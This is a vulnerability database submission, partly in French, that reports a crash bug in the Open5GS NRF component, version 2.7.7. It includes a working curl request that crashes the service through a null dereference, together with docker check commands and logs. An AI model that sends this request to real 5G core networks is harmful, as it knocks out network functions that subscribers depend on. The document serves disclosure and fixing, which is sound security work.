Soumettre #808509: Open5gs NRF v2.7.7 Denial of Serviceinformation

TitreOpen5gs NRF v2.7.7 Denial of Service
Description### Open5GS Release, Revision, or Tag v2.7.7 ### Steps to reproduce ### Description NRF crashes during inter-PLMN discovery fallback when an invalid `hnrf-uri` query parameter is supplied together with `target-plmn-list` and `requester-plmn-list`. In the fallback path, if no matching home-PLMN NRF is found, the code tries to parse `hnrf-uri`. On parse failure it logs `request->h.uri`, but `request` has not been initialized on that path. This leads to a null dereference and terminates the NRF process. ### Steps to reproduce ```bash curl --http2-prior-knowledge -m 5 -sS -i --get \ 'http://10.33.33.3/nnrf-disc/v1/nf-instances' \ --data-urlencode 'target-nf-type=NEF' \ --data-urlencode 'requester-nf-type=AF' \ --data-urlencode 'target-plmn-list=[{"mcc":"999","mnc":"70"}]' \ --data-urlencode 'requester-plmn-list=[{"mcc":"001","mnc":"01"}]' \ --data-urlencode 'hnrf-uri=not-a-valid-uri' ``` Then check: ```bash docker inspect -f '{{.State.Status}} {{.State.ExitCode}} {{.State.FinishedAt}}' nrf docker logs --since 2026-04-10T17:14:16Z nrf ``` ### Logs ```shell curl: (92) HTTP/2 stream 1 was not closed cleanly before end of the underlying stream exited 139 2026-04-10T17:14:17.099516514Z 04/10 17:14:16.997: [sbi] ERROR: yuarel_parse() failed [not-a-valid-uri] (../lib/sbi/conv.c:549) ``` ### Expected behaviour NRF should reject an invalid `hnrf-uri` with a normal HTTP error response and remain running. ### Observed Behaviour The HTTP/2 stream terminates abnormally and the NRF process exits with code `139`. ### eNodeB/gNodeB Not required. ### UE Models and versions Not required.
La source⚠️ https://github.com/open5gs/open5gs/issues/4457
Utilisateur
 LinJu (UID 97503)
Soumission20/04/2026 21:50 (il y a 1 mois)
Modérer11/05/2026 10:02 (21 days later)
StatutAccepté
Entrée VulDB362589 [Open5GS jusqu’à 2.7.7 NRF /lib/sbi/conv.c yuarel_parse hnrf-uri déni de service]
Points20

PrécédentAperçuSuivant

Do you need the next level of professionalism?

Upgrade your account now!